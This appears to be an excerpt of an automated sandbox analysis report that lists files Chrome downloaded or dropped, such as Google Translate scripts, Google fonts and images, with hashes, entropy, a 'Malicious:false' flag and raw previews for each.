                                                                                                                                                                                                                                                            SSDEEP:3072:qc5sT0m6XsrNKhs62zrXFtbE5RUIjmGw2qn:qUW0pcslGFtYoomrH
                                                                                                                                                                                                                                                            MD5:AB609A568BFE6CDA5FB0F5518E3F6F76
                                                                                                                                                                                                                                                            SHA1:D82E05821F44AA8D55A9A290EC93BA22FF266145
                                                                                                                                                                                                                                                            SHA-256:F46051A1C6C4C0E0A2D7FFC49D11FBC9AB9EA984DFC35BA26ECB923914740537
                                                                                                                                                                                                                                                            SHA-512:D41667A46F196D614879B147C9189EA04D4A0C3B2C83DFF445FBE5ED27BF7BC665F731BC28BBD50439086E7997BEC5665B898C2580B43010950BD72BBAEA1E41
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverWebsiteTranslationUi.en.o0mxDulwOdA.es5.O/am=8CwACA/d=1/excm=_b,_r,_tp,iframenavigationview/ed=1/dg=0/wt=2/rs=ANkVxDmaLte50X2jGJ1bfmFLHmF-EVRBpg/m=_b,_tp,_r"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverWebsiteTranslationUi=this.default_TranslateWebserverWebsiteTranslationUi||{};(function(_){var window=this;.try{./*.. Copyright 2013 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2011 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0 */./*.. Copyright 2005 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2008 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2020 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/.var fa,ja,Ha,Ma,Ra,Ta,Ua,Va,Wa,Xa,Ya,ab,bb,cb,eb,fb,gb,ib,jb,ob,wb,zb,Cb,Ib,Ub,Vb,ec,jc,mc,nc,pc,qc,tc,uc,vc,wc,xc,yc,sc,Cc,Gc,Ic,Lc,Jc,Nc,cd,Yc,dd,fd,hd,td,xd,ud,zd,B,Dd,Kd,Pd,Sd,Td,Zd,ae,je,pe,Fe,ye,Ie,Ke,Le,Ne,cf,ef,lf,mf,tf,xf,yf,zf,Af,Bf,Jf,Lf,Pf,Uf,aa,Vf,Wf,Xf,Zf,$f,bg,cg,jg,kg,lg,og,rg,pg,qg,sg,tg;_.n=fun
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6986
                                                                                                                                                                                                                                                            Entropy (8bit):7.964253357716648
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:y0e4OAPRNbgnMaFkXJv8gX5o0TqEGki5O5l5I:9e4OAPgnMakZv86o0mEGkPT5I
                                                                                                                                                                                                                                                            MD5:DD13DCDAA7EBB9C9E6A1A9FE0972CD9F
                                                                                                                                                                                                                                                            SHA1:3D25C1CAC68EFE2F33C29E0A0813E653B55D8F2C
                                                                                                                                                                                                                                                            SHA-256:55FBD109C32EF241D7167E1CA40A073639142165A23618125A707833BE7F4B7E
                                                                                                                                                                                                                                                            SHA-512:D47FAF554BC2E10C1EA6B1610D2E40A93E30CBDEB8D598C0156329BA6EBE89EC1B87D90F61DBB949E39B380E252BB6CE3937E3B254F71D78E5BF4C1D0C21F1C5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:RIFFB...WEBPVP8X........y.....ALPH.........!I......3..[+;k.3.F.o`.3.~..+.m;[V........DL..=....>......YS...}.m.E?.w...VD.H(,}(.F.......P|..F.w...F@.v...z....r.+....<[-.5...g......-6Z.J.....D.C.1v.\X...g...v+..bLD.g..W..d.k.UU&E.X.o.3(.`.J..<D.=:+.~.n>l.hVp.5.9..o......1..Y....pn...L.....?.......c......?.......c......?....}...w.?..3K}.]..J.qz.F5....p#...%.....!....R.Q..\8.6W..$.`.Z.c *?B...d..K..W.jD..@3.H."....s.~.}.1..<...P........`..#....x.......-W..a.(....V../....../.....o..(\S...>.>..o.}.U+(j.....(z.!.....VP8 (........*z...>m4.G.#"!%.....gn.q..Qa.o..l@...1..h.?./..w../.U..M...{............>..`.............#.7.....;F..<.}..o?\~..L..?....'..k....~.x.._.....".........O./.~_j....o.\&`..o..?.{.|..oD~....0.+.?..D....}q.-.-.......~......L.#.2.C7......._ PI........._ PD}hH..;...zFK/~R....w6...;.{?.................+....b...m.5.....|.'.{...L..."0.....'Y.*1|J..-.<.CQ.=.b@+.r.N.).s..5M.,..Xn...m0......F`.r.YV...}-u....N..........<B..l....8Y..X.R.!...v
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2299)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):13296
                                                                                                                                                                                                                                                            Entropy (8bit):5.411639719190308
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:9mCWVoCfcjxXfYXWbihdSFBKA9bONQ3FoH9cTJaBBBWcQp0oSp/pZzbm1hiW2+c:9m5VNwxXfYmWhdS3K7V1QAp/pQ1pc
                                                                                                                                                                                                                                                            MD5:8DD7967D1E313A398D6DC6661AE5EA70
                                                                                                                                                                                                                                                            SHA1:EE8845574395706381EB2EDE9B543D05551063A3
                                                                                                                                                                                                                                                            SHA-256:BA3FC776CD07E23390DF02B6A3CE156CA59CE4BB178625566680F62E8B8D20CE
                                                                                                                                                                                                                                                            SHA-512:4913D1C070FE9F8E1E583E2CE69F737DA17C6F2BBE97D9687B34378E148A48D1BD8C4B3CB8D4B89FA7BEC4785E69EEC45CC95D77798D6EDB727EB12D6AED7369
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=RqjULd"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("RqjULd");.var Xta=function(a){if(_.ea&&_.ea.performance&&_.ea.performance.memory){var b=_.ea.performance.memory;if(b){var c=new GB;isNaN(b.jsHeapSizeLimit)||_.x(c,1,Math.round(b.jsHeapSizeLimit).toString());isNaN(b.totalJSHeapSize)||_.x(c,2,Math.round(b.totalJSHeapSize).toString());isNaN(b.usedJSHeapSize)||_.x(c,3,Math.round(b.usedJSHeapSize).toString());_.kj(a,GB,1,c)}}},Yta=function(a){if(HB()){var b=performance.getEntriesByType("navigation");if(b&&b.length){var c=new IB;if(b=b[0]){switch(b.type){case "navigate":c.qe(1);.break;case "reload":c.qe(2);break;case "back_forward":c.qe(3);break;case "prerender":c.qe(4);break;default:c.qe(0)}var d=_.x(c,2,Math.round(b.startTime));d=_.x(d,3,Math.round(b.fetchStart));d=_.x(d,4,Math.round(b.domainLookupStart));d=_.x(d,5,Math.round(b.domainLookupEnd));d=_.x(d,6,Math.round(b.connectStart));d=_.x(d,7,Math.round(b.connectEnd)
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 16116, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):16116
                                                                                                                                                                                                                                                            Entropy (8bit):7.986129736201439
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:Gz/EqWTJWq65SvzFEiGXItKMhE9VVvVqW:nToq65S7G3XItK9VVvVB
                                                                                                                                                                                                                                                            MD5:5233158288AB6D762C2FEE42842F28C1
                                                                                                                                                                                                                                                            SHA1:7F1EBE75DB34F87238EAB1069BB1FC513263C84E
                                                                                                                                                                                                                                                            SHA-256:1846FABCB5AEC1AE21D8F0D07B2A3606B86CB419580CAF73B61EF574F0F4D82A
                                                                                                                                                                                                                                                            SHA-512:73F3D252308418720DB5827D76089A9D3440C3591294BD6888D85CA646351AD1D05D68E1BC9F51EE72F316A7530F4CD52C6DA2F46ABC4429CA5D7113DC33D71C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPhEUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......>...........>.................................B?HVAR.7.`?STAT..'...R/<....h.<..V.0.|.6.$..(. ..>. ...kv..m....?.......!T..FE9cB...>n..,D..z...\U....B.<.OS....r......}..S.'?d..j..P|P.......IN~..T.;v7...W....kt..ba.M...}....Gh.#.......{...c..x....4..a..iB..ZXw.[.TG.......{.J.eI....L..C`.`....f.<r._.u.1.+.e.R..+.9...T.Z....s.+.s .#.$#Y.:.Z.... 5..b.s.Y.b.9...qC....y.e.{.M..l.D%K.a#HB...!......'..)T.jj.&.6m..JZ..c..0.83......7..~?....{w.....h.H$<$.L..D..D......2....\.e..X.P.o.<..@.....'.d..F%....C..?.F#.h.v|.. ..[....z....E..#.89.;87.[ .~.!.u&.=...uq.d.......v.S..a..N.k.A-nO.d..{u.;....#i.d;Y...c..._.....Q..R5.}......8..\g...qSAK(|}.(...R..p!.:..Uv.s...)...e.M..K...7.{.}..B.r9N.E>S.R.-g.\O,.R.\....w..S....y.g.|k ...|.....x.^).2cC..>.....Y*..N..<.3..[..=..B...../+.-..8lD...kw.he..mv..B.#.j..M..B..?..3b..1...+C.P..{w...n..+@q.N((.,.A..V....6m..:.:......!..F.F...0K`...4...@...0.X.<..\.../...."(X.G......0.....V........gH.A..F..........6...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 898 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):134112
                                                                                                                                                                                                                                                            Entropy (8bit):7.9914969556323285
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:06r8uVET6f6L4a3pbrJSL7j8GbOzm9zu6e1PDH:06r8u/6V5btCoKOzie1LH
                                                                                                                                                                                                                                                            MD5:0950B67A574AB493543AC9385AA61123
                                                                                                                                                                                                                                                            SHA1:919CD2BD3A24538417A70F97973ED9A8CF18DA9C
                                                                                                                                                                                                                                                            SHA-256:004ACF195C8386C88C23D72E52EF903D30919871322935DEEBE9C0B63EBBBDF5
                                                                                                                                                                                                                                                            SHA-512:5BAACAB7956D25BAB8250611F8041F7F20322E45311B7A03E5C2050A5C08BA03BE062B01E3790A6ADF828D2006621FB635FD9F3D098D73CFCD0B8498F2C1B90A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.............'.......PLTE........................................}..=YX2<?.*-.#'."%.),#8=aik8AD<HJVdeu{}./3.%)(16KTW.,/krt.15DMP!6;-6:!12R[].').38)7A!56.+/#=F%97.-1$-1.',.'*.!$. #.$'!*-.#&.. .%)."&."$..!."%.!#&BN..!..#....."(JU)?:U.y`...."o..1H=".'$6+(?/*:+5F.,E11@,9K/<N0 %$ad.?Q0AT1J9Y16GCV1EX1<8OFZ1LW3:Q>GR1IK/@C-VT1O]5IC-:9*,+'[X2CL/PO0&(%\=d04*c\4Vb7n?tA;,WJ3e]GojGHH>.}T.e.l..W..r..V._z._..e..TiaR9.sP.q..o..r..r.E_D..\]g6OB0u]A.B.lY;.gEcl870(=1)....{.2,'...J<-.D.eN3^I1`f@.......\F0aK2..\..t...XP@XD0..hU@/cM3hq9...A3*..QR=-.|.L8+O:,J6+E4*H6+L7+.J.9.l-.Z&.N ~F.lB8.D6.X@.[A.R=w.C..E..Dr.SRpI..J..Q..V..\..Wb.M.._..a..d..i.._..^..\..i..Z..Y..e..y..oz.{4[.b..z../R|<i.+Jk?n.Fw.W..@u.At.M..7a.?r.Av.Ar.Dx.[l.@t.Dw.I{.An.Dy.Bi.Bc.B[.9l.CT....]....l.......s.......R...x......./v.W....IDATx.....0......{.3.R...............................1..K....G.)..FL....{..O.)../..Uu-..)4..s$..&@.AtFt+..........zz...4....x...8.....e.?......S..,U.'.......#P....$^<....a.^..3..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 1440x960, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):266842
                                                                                                                                                                                                                                                            Entropy (8bit):7.97786893984036
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:fL6Dq4Hm9P+1PT8JfafaM+Za6DkVp+YNlCLHSF7GCZ59EbR/zdS/O:Wqkm9UPTOfVUikVEel6HyGDlzqO
                                                                                                                                                                                                                                                            MD5:F2B91185EB0C95055C5358880BF805E9
                                                                                                                                                                                                                                                            SHA1:7C8E53CEBB2D9BCF0CABAD19481CB3FA7EE1AC2F
                                                                                                                                                                                                                                                            SHA-256:EC18AA822EE3A58D595305F2988FCAF99A8A871172306CFE96D42CBD0EC2C970
                                                                                                                                                                                                                                                            SHA-512:417E43A705F78B8C8C087BEBFAC8701197B1F90A67301A0B79DA9815B90891140FDD132E60F63A655B20C5AC24047534160FEF9DCEB970BA9900B50CF664DDC0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.....................................................................................................................................................".........................................M......................!1..A..Qaq.."...2....B....#Rr3b.$C.....4Sc...%DT....d.................................7.......................!1.A"Qaq..2..B..#....3..R.b.r$........
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 660 x 264
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):874802
                                                                                                                                                                                                                                                            Entropy (8bit):7.842651135436318
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:aFc9QSWqyjjQqdU7DulAwuFxOPOj3ACepWpebd4S4:7FKjjQnb+QYWpIOS4
                                                                                                                                                                                                                                                            MD5:5706D0BEFE37D6D57BC8E9EC37A5E761
                                                                                                                                                                                                                                                            SHA1:65B76F76984034483ACA5A69B8E7ACEBDA317A4E
                                                                                                                                                                                                                                                            SHA-256:377DE5D78C7D84F76A4CF8B9E81B11C9D7EA256B7C354DFABB1775F0D9DF6071
                                                                                                                                                                                                                                                            SHA-512:272FC5D23EF67C619A132C79E32259CF6065947580F549B6CD6CC38AF67EE522AB177050E09CEB0FA9159393030C7CCE8E379EB444AD863DDC1BF63AE8D8DA97
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/WsTh371vqLlKjqDM-BIB6lrZvkq6LeGcGgZA-Gdh57kK2G8Tt9EY3gFCQ5SRm-Wl9HrdAE83S-LH2uLsl4c1tEmqccdISKm7DzG4VOihfg=s660
                                                                                                                                                                                                                                                            Preview:GIF89a.............!..NETSCAPE2.0.....!.......,...........D..!.......,...........D..!.......,............a.h....C..E.,N-..G...Fi..!J.#..C..c..2.f...2....Hl....6..$i..f.4.!R.=S...'.g.T...4e.5.....Aa:t.+D.....S.4b...G.C.AhW.$w.d...gIu.....&.$..:....... S..T.>w....&A.....b.q..u...,.Uv.Ge..+x..w...8O|..]^....8!<...U.J........3.6U.$Q.d.......V.0.."X.H.....3z2J....Ec..D..;.B]z....-.....[.-l.s......*hO.. =}.[.;\..8z.4.3r...h.......L.`t..=.Er.. !..v..8.;....-k..,..*|.=..L.8S....8y...z.....2@.7D@....87d.y...Npu*r....6..|..u.r....GF*'(r.._n.)?i.....v..FU7......Zr.r..X_o3l.56/5a..%;9Q-o..........n..Fjh...l...F_e~.*7..<........~..Tkd...)Z.3Hz...Ic.Jw....s......*_.0^...&...O|./L...wJk...9@Z.......#y....I\....J.,...7..Y.......3....Ygz..j.....W.....t....8nv...?..H..i...@Ux.K.\..Avy8h._..<j|.#..5.av.Vs..D....J.v...I.Jr.....)\!M..:p....$H.b.......3R....v...C.......H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 162924, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):162924
                                                                                                                                                                                                                                                            Entropy (8bit):7.998614826254304
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:XdhkQyBlHVVYwHUFDrzXtPz/qJwZmUyhjpimMS6DW4hb59a06EziVFKth8Biq:wQyBBvYw0FD/tPWJZjI3PXhbrduVFc8f
                                                                                                                                                                                                                                                            MD5:7F2E1B48B71EC58FDA4539018A2F56CC
                                                                                                                                                                                                                                                            SHA1:507BF81F52FA8C99BF2C5C8BD59A981899CA9995
                                                                                                                                                                                                                                                            SHA-256:7F80C4C91054B3D6C80721939242C2D4F68F15E41F251E12641F695D78EB2F35
                                                                                                                                                                                                                                                            SHA-512:DD7B52119D1179332147984F6C7D8CDCB3388AEB1E8AF708EF9036ACDDE6E7B3900ACC965221F4E4864DAD89797072E19E5B308CF065A65DDA7656BE884CDD77
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/materialiconsextended/v149/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvJ.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......|l..........|..................................`..P..........N.....6.$.... .... [.m.A.B.$...c....5s/E...%.u..v..J6...:......;............$........@..M..... 8.HA.6%R...tB ..D..M".f.$G.....<....~.y;..R..23.S.T...p...'V{|u.,S....Z...lZ)..Dc..D..;=n...V...<.X6...h.......:sw.....T.6.eF..!=*.f..H\..dDd*.q"s.E.Q......JT..v..#Mf"sH}A.>.....q.h.mLC...Q..Cv...+|.u......6..B...I......K..I...R.[..m(...P<B."R.Ap.f.j:.o...\o..L..G3Yn.C..........\rI..$$!DH.!....v0r.E...p..WK.v...muW...*X.[. ......j...1\U..8V.&.X..i.T^TO..^\......&.g2Iv....>.J(.T.*..y...v....4.f..a....$.K...M-5...1D.ya...'.'...A ....!.@..c...$.D.3q..:...:&O.rV..V..v.m...[-.Z..m.......:o......$}.h..i.N.FH.$(..Zq....v...k. ._.A...J&.J..D.......>...~!...H.".$........_...;v...*gU....W Y3lI...;.....RG.....|.rw.. ..=@.....N.....=.W..=O.(...`..M......Y..&.O. R..'0.~6@$.4f.`I@.dV{..YJ[j`v).1(.L.."(oO...R...cI(.l.K..P,1.C.b....A=,u.B....;wm..H{.>......8e.8d.2.~.4.CDDDDDDDD..|.Z..s.G!.._.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):44610
                                                                                                                                                                                                                                                            Entropy (8bit):7.968947283432421
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:ZEOQPj+SNwvVD5LbpS+bfEcaAIdfyU7wjhp64JoJrBRA/3U3Ag3KE1qRHzmXTYg0:ZEOQKSNwt9I+bfE/dfyNjX6BrBRW3UrY
                                                                                                                                                                                                                                                            MD5:8BFD8185544CB8F430AA5889EED16285
                                                                                                                                                                                                                                                            SHA1:C077108158CD8752951C417DA119E3C2BC2F4A6F
                                                                                                                                                                                                                                                            SHA-256:28131B5A09F4E8FCF485B46D75798B2CD717276A915B6EB9FE0CED5F2A669748
                                                                                                                                                                                                                                                            SHA-512:BADAAA738405A17EF41AC82394DB04E70B7C92EAA19DA740AA3E81132CF7114CB4A1593AF08CF201D1CC01E83226A86D5FF4A75F4A4939A1754CF248E0568E2D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................F......................!...1A."Qaq.....2B.....Rb..#r......3C.$.s.4S..................................:.......................!1.A..Q"2aq.....B....#3RC.br...............?.....dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB..Cm...b..B..D1..m..f.b.6.(.4YF.......!..].l&...xb.7...6...t..EY..tK6......tQ....gBTJ*.1tK:."QZ..1..MGB..IZ....+Y....k+..:.D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..dB...D!..Y.b.7.%..E..h.K6.tU..!,...*....Y.1d.xb.f....E...qtU..QtU..1tU...tU..4..u..,^.....(........d.....u...<".0u.&.< .2..T.......L.....>i2.#...`.......t...=z...u~S..]4....+.L..Q...1t.......r..g.>P..M....z.J..a..9t....C.../.Y....:^._.c.<*<9.C"..2!..C"..2!..C"..2!..C"..2!..C"..2!..C"..2!..Cm.Cxb....h.Cm.EY.1.f...F.b.`.Q.............g].^..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 6024, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6024
                                                                                                                                                                                                                                                            Entropy (8bit):7.959675378604305
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:TgLiMidiJpTf4ZdU9SLsb7ZT03y16eZAkdctu2GpGQblTIQs0q1L2cXhi7XvsIMs:8inYTfEi9SLsb7Ey16UAkdc9GprhTtsi
                                                                                                                                                                                                                                                            MD5:A573C01E49F793B851CA2F2C5FE5561E
                                                                                                                                                                                                                                                            SHA1:A51ECAE4E163EB37F2983E9337BFFC2957CAA004
                                                                                                                                                                                                                                                            SHA-256:5CCAC6220939E464BAE744DF0CABC646CA1078D982EA076783E905F47EB4014D
                                                                                                                                                                                                                                                            SHA-512:71FE0A51CAD49E885EE43F18188FED3AC7DE5416EB9AA4D9113D5D56023BF212AC39D47816D14FC56D9616165F6543DB08A75AC93D75620FAA615D9EDA5F7876
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPj0UvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2..............<\..............................N..h..P?HVAR.o.`?STAT..'...8/<.........,.0...6.$..T. ..>. ...J63....@p......n..bj.u...mvw....a.!g,t_.=._n6.!UR..Q.q......O.h...h.:.a...g5....GQ.T.!.=....M..qB..D#..$.1 .^h.J..........L-<.1....V.....d.Df.IC$..F).H(..&h_.\.m|*........C....rv.rZ...|.....Bm>F.......yJ.'...]...;0.J..........U.49...VQ......F.jlg.*...f..G.k..$....m|..9"..{]i..=....k..J...oe..A..../...d.3...i.=...........t7.2...,S.(....'..........rpV+578..U.u....)D.p.]x...........!....QR"j.H.T$..1.@..A.8.6m.K.....E..#.V...4].$.Jo@....)....y....s..<.gf.{.].F...U....-....S>de1...szNx.^.#X..23...L`A..^..q..$@.@.......F..y...G.KX.]m..G.u....'..Ekp~..-6.5.....C{P&S.9.....9.7g.,.m......4.d...s..g.H.....}...o...F.6..Fk......*SWP......k....CwMk`S...K....@..Q...&..T..{h.Rl.&p...;g.ah.Q..3K!.*.R...\..L M-..B.i>.EB...!r......&.&..7O(...l....X.v|..c.9..c3.!.b.3..-.X....fI.-N.4N.4N.tu^y.G....8...1.{.je...zq./U...P.B:...d..$.Gs.pb4"a..R....k....4..d.*./..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 850 x 250, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):14589
                                                                                                                                                                                                                                                            Entropy (8bit):7.945522019911137
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:l+aUZOeInaJ9obSgvEIEzEPyQvkogkrVqOs8RdF81obX/8DSMt02OJ:lAZxI1b/TEzIkGhqOzu1ojWSC0l
                                                                                                                                                                                                                                                            MD5:5E5848739169BCAA9BA5E40FE5EBF710
